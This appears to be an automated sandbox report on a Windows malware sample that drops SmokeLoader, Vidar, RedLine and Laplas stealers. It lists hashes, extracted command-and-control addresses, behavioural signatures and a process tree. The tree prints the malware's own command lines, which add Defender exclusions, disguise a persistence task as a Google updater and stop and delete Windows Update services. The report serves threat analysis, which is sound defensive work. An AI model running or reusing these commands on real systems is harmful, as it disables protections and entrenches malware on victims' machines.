Analysis

max time kernel: 82s
max time network: 135s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12/04/2023, 03:06
Static task: static1
Behavioral task: behavioral1
  Sample: 74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe
  Resource: win10v2004-20230220-en
General

Target: 74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe
Size: 212KB
MD5: d0a7d700851f79d277edb894d255d857
SHA1: bdabd3986483dcf95be18c4057d1f0f7909e6f6e
SHA256: 74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8
SHA512: e3d4160a3e818d0ad71a02ba2d3d51bf25aca0a12d2849cf7ab1363fd0d17ed6168471e6fe5053a3f5108819f139ca113503408ec9a03aaf300a1e4d00d36086
SSDEEP: 3072:2tYU/l+KhAGQmMDMXnV7DasXIyZsBOGOq4cKVAMDfs5t1W0bLv:WYUt+wQmB3V66sEGocHG8R
Malware Config

Extracted: smokeloader
  sprg
Extracted: smokeloader
  2022
  http://hoh0aeghwugh2gie.com/
  http://hie7doodohpae4na.com/
  http://aek0aicifaloh1yo.com/
  http://yic0oosaeiy7ahng.com/
  http://wa5zu7sekai8xeih.com/
Extracted: vidar
  3.4
  e749025c61b2caca10aa829a9e1a65a1
  https://steamcommunity.com/profiles/76561199494593681
  https://t.me/auftriebs
  profile_id_v2: e749025c61b2caca10aa829a9e1a65a1
  user_agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Extracted: redline
  build03
  65.21.3.192:32845
  auth_value: 688766d7eb9d4a5fde1dec6cdf7c3d9e
Extracted: laplas
  http://185.106.92.74
  api_key: bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
Signatures

- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
- SmokeLoader
  Modular backdoor trojan in use since 2014.
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  description | pid | Process | procid_target
  PID 2860 created 3216 | 2860 | Tzairumea840.exe | 27
- Downloads MZ/PE file
- Stops running service(s) (3 TTPs)
- Checks computer location settings (2 TTPs, 3 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation | F24.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation | FAEF.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation | 59494271101313438416.exe
- Executes dropped EXE (7 IoCs)
  pid | Process
  952 | FAEF.exe
  1412 | F24.exe
  664 | 59494271101313438416.exe
  4832 | 72276251160032612667.exe
  4536 | svcservice.exe
  2860 | Tzairumea840.exe
  3324 | F24.exe
- Loads dropped DLL (2 IoCs)
  pid | Process
  952 | FAEF.exe
  952 | FAEF.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- yara_rule matches (5 IoCs)
  resource | yara_rule
  behavioral1/files/0x000800000002314d-305.dat | upx
  behavioral1/files/0x000800000002314d-307.dat | upx
  behavioral1/files/0x000800000002314d-308.dat | upx
  behavioral1/memory/4832-310-0x0000000000AF0000-0x0000000001953000-memory.dmp | upx
  behavioral1/memory/4832-314-0x0000000000AF0000-0x0000000001953000-memory.dmp | upx
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Adds Run key to start application (2 TTPs, 2 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe" | 59494271101313438416.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xrdsu = "\"C:\\Users\\Admin\\AppData\\Roaming\\Ygpxl\\Xrdsu.exe\"" | F24.exe
- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Suspicious use of NtSetInformationThreadHideFromDebugger (4 IoCs)
  pid | Process
  664 | 59494271101313438416.exe
  664 | 59494271101313438416.exe
  4536 | svcservice.exe
  4536 | svcservice.exe
- Suspicious use of SetThreadContext (1 IoC)
  description | pid | Process | procid_target
  PID 1412 set thread context of 3324 | 1412 | F24.exe | 118
- Launches sc.exe (5 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  pid | Process
  4804 | sc.exe
  3132 | sc.exe
  3740 | sc.exe
  932 | sc.exe
  2152 | sc.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Program crash (1 IoC)
  pid | pid_target | Process | procid_target
  5072 | 952 | WerFault.exe | 85
- Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe
- Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | FAEF.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | FAEF.exe
- Delays execution with timeout.exe (1 IoC)
  pid | Process
  3972 | timeout.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | Process | identical rows
  3052 | 74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe | 2
  3216 | Explorer.EXE | 62
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid | Process
  3216 | Explorer.EXE
- Suspicious behavior: MapViewOfSection (19 IoCs)
  pid | Process | identical rows
  3052 | 74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe | 1
  3216 | Explorer.EXE | 18
- Suspicious use of AdjustPrivilegeToken (13 IoCs)
  description | pid | Process | identical rows
  Token: SeDebugPrivilege | 1412 | F24.exe | 1
  Token: SeShutdownPrivilege | 3216 | Explorer.EXE | 5
  Token: SeCreatePagefilePrivilege | 3216 | Explorer.EXE | 5
  Token: SeDebugPrivilege | 4636 | powershell.exe | 1
  Token: SeDebugPrivilege | 4248 | powershell.exe | 1
- Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | Process | procid_target | identical rows
  PID 3216 wrote to memory of 952 | 3216 | Explorer.EXE | 85 | 3
  PID 3216 wrote to memory of 1412 | 3216 | Explorer.EXE | 89 | 3
  PID 3216 wrote to memory of 4980 | 3216 | Explorer.EXE | 90 | 4
  PID 3216 wrote to memory of 2336 | 3216 | Explorer.EXE | 93 | 3
  PID 3216 wrote to memory of 4760 | 3216 | Explorer.EXE | 94 | 4
  PID 3216 wrote to memory of 4524 | 3216 | Explorer.EXE | 95 | 3
  PID 3216 wrote to memory of 2468 | 3216 | Explorer.EXE | 98 | 4
  PID 1412 wrote to memory of 4636 | 1412 | F24.exe | 99 | 3
  PID 3216 wrote to memory of 3852 | 3216 | Explorer.EXE | 101 | 4
  PID 3216 wrote to memory of 4440 | 3216 | Explorer.EXE | 102 | 4
  PID 3216 wrote to memory of 1580 | 3216 | Explorer.EXE | 103 | 3
  PID 3216 wrote to memory of 408 | 3216 | Explorer.EXE | 104 | 4
  PID 952 wrote to memory of 664 | 952 | FAEF.exe | 105 | 3
  PID 952 wrote to memory of 4832 | 952 | FAEF.exe | 107 | 2
  PID 4832 wrote to memory of 3224 | 4832 | 72276251160032612667.exe | 108 | 2
  PID 952 wrote to memory of 2852 | 952 | FAEF.exe | 113 | 3
  PID 3224 wrote to memory of 1540 | 3224 | cmd.exe | 110 | 2
  PID 2852 wrote to memory of 3972 | 2852 | cmd.exe | 115 | 3
  PID 664 wrote to memory of 4536 | 664 | 59494271101313438416.exe | 116 | 3
  PID 1412 wrote to memory of 2860 | 1412 | F24.exe | 117 | 2
  PID 1412 wrote to memory of 3324 | 1412 | F24.exe | 118 | 2
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

Process tree as recorded by the sandbox; indentation gives parent/child depth, and a command line is shown only where it differs from the image path.

- C:\Windows\Explorer.EXE (PID 3216)
  signatures: Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe (PID 3052)
    command line: "C:\Users\Admin\AppData\Local\Temp\74b1fba94544e5ef79c8907d2c5e392b6b0f948f08e445a940239a7d0ec1eca8.exe"
    signatures: Checks SCSI registry key(s); Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection
  - C:\Users\Admin\AppData\Local\Temp\FAEF.exe (PID 952)
    signatures: Checks computer location settings; Executes dropped EXE; Loads dropped DLL; Checks processor information in registry; Suspicious use of WriteProcessMemory
    - C:\ProgramData\59494271101313438416.exe (PID 664)
      command line: "C:\ProgramData\59494271101313438416.exe"
      signatures: Checks computer location settings; Executes dropped EXE; Adds Run key to start application; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe (PID 4536)
        command line: "C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"
        signatures: Executes dropped EXE; Suspicious use of NtSetInformationThreadHideFromDebugger
    - C:\ProgramData\72276251160032612667.exe (PID 4832)
      command line: "C:\ProgramData\72276251160032612667.exe"
      signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (PID 3224)
        command line: C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\72276251160032612667.exe
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\choice.exe (PID 1540)
          command line: choice /C Y /N /D Y /T 0
    - C:\Windows\SysWOW64\cmd.exe (PID 2852)
      command line: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\FAEF.exe" & exit
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\timeout.exe (PID 3972)
        command line: timeout /t 6
        signatures: Delays execution with timeout.exe
    - C:\Windows\SysWOW64\WerFault.exe (PID 5072)
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 952 -s 648
      signatures: Program crash
  - C:\Users\Admin\AppData\Local\Temp\F24.exe (PID 1412)
    signatures: Checks computer location settings; Executes dropped EXE; Adds Run key to start application; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4636)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
      (the -ENC argument is base64 of UTF-16LE text and decodes to: start-sleep -seconds 20)
      signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Users\Admin\AppData\Local\Temp\Tzairumea840.exe (PID 2860)
      command line: "C:\Users\Admin\AppData\Local\Temp\Tzairumea840.exe"
      signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Executes dropped EXE
    - C:\Users\Admin\AppData\Local\Temp\F24.exe (PID 3324)
      signatures: Executes dropped EXE
  - C:\Windows\SysWOW64\explorer.exe (PID 4980)
  - C:\Windows\explorer.exe (PID 2336)
  - C:\Windows\SysWOW64\explorer.exe (PID 4760)
  - C:\Windows\explorer.exe (PID 4524)
  - C:\Windows\SysWOW64\explorer.exe (PID 2468)
  - C:\Windows\SysWOW64\explorer.exe (PID 3852)
  - C:\Windows\SysWOW64\explorer.exe (PID 4440)
  - C:\Windows\explorer.exe (PID 1580)
  - C:\Windows\SysWOW64\explorer.exe (PID 408)
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4248)
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3260)
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mmwusnu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  - C:\Windows\System32\cmd.exe (PID 1344)
    command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - C:\Windows\System32\powercfg.exe (PID 4272)
      command line: powercfg /x -hibernate-timeout-ac 0
    - C:\Windows\System32\powercfg.exe (PID 896)
      command line: powercfg /x -hibernate-timeout-dc 0
    - C:\Windows\System32\powercfg.exe (PID 3972)
      command line: powercfg /x -standby-timeout-ac 0
    - C:\Windows\System32\powercfg.exe (PID 2852)
      command line: powercfg /x -standby-timeout-dc 0
  - C:\Windows\System32\cmd.exe (PID 4732)
    command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    - C:\Windows\System32\sc.exe (PID 3132)
      command line: sc stop UsoSvc
      signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 3740)
      command line: sc stop WaaSMedicSvc
      signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 932)
      command line: sc stop wuauserv
      signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 2152)
      command line: sc stop bits
      signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 4804)
      command line: sc stop dosvc
      signatures: Launches sc.exe
    - C:\Windows\System32\reg.exe (PID 4344)
      command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    - C:\Windows\System32\reg.exe (PID 4496)
      command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    - C:\Windows\System32\reg.exe (PID 2156)
      command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    - C:\Windows\System32\reg.exe (PID 2748)
      command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    - C:\Windows\System32\reg.exe (PID 4636)
      command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4792)
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yqhkxrl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
    - C:\Windows\system32\schtasks.exe (PID 1948)
      command line: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1564)
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
- C:\Windows\SysWOW64\WerFault.exe (PID 4452)
  command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 952 -ip 952
- C:\Program Files\Google\Chrome\updater.exe (PID 1260)
  command line: "C:\Program Files\Google\Chrome\updater.exe"
Network
MITRE ATT&CK Enterprise v6
Downloads